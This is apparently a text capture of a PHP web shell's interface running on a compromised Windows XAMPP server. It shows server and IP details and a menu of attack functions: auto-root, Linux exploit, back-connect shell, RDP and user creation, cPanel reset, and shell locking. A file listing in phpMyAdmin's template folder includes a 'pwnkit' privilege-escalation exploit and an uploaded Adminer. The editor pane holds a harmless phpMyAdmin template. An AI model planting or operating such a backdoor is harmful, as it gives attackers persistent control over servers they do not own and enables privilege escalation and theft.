Windows NT IZOXMIX7871CBCZ 6.3 build 9600 (Windows Server 2012 R2 Datacenter Edition) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
: 172.23.17.241 | : 216.73.216.172
Cant Read [ /etc/named.conf ]
8.2.12
Administrator
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
[ C ]
C: /
xampp /
phpMyAdmin /
templates /
table /
find_replace /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
index.twig
2.47
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
replace_preview.twig
1.28
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : replace_preview.twig
<form method="post" action="{{ url('/table/find-replace') }}"> {{ get_hidden_inputs(db, table) }} <input type="hidden" name="replace" value="true"> <input type="hidden" name="columnIndex" value="{{ column_index }}"> <input type="hidden" name="findString" value="{{ find }}"> <input type="hidden" name="replaceWith" value="{{ replace_with }}"> <input type="hidden" name="useRegex" value="{{ use_regex }}"> <div class="card"> <div class="card-header">{% trans 'Find and replace - preview' %}</div> <div class="card-body"> <table class="table table-striped w-auto"> <thead> <tr> <th>{% trans 'Count' %}</th> <th>{% trans 'Original string' %}</th> <th>{% trans 'Replaced string' %}</th> </tr> </thead> <tbody> {% if result is iterable %} {% for row in result %} <tr> <td class="text-end">{{ row[2] }}</td> <td>{{ row[0] }}</td> <td>{{ row[1] }}</td> </tr> {% endfor %} {% endif %} </tbody> </table> </div> <div class="card-footer"> <input class="btn btn-secondary" type="submit" name="replace" value="{% trans 'Replace' %}"> </div> </div> </form>
Close